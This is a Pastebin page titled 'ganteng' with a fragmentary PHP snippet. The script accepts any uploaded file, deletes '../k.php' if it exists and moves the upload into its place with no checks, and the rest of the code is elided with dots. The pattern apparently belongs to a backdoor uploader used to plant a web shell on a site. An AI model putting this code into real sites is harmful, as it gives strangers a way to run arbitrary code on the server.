Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ganteng
- <?php
- $file3 = $_FILES['file3'];
- $newfile3="k.php";
- if (file_exists("../".$newfile3)) unlink("../".$newfile3);
- move_uploaded_file($file3['tmp_name'], "../$newfile3");
- ...
- ......
- .......
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement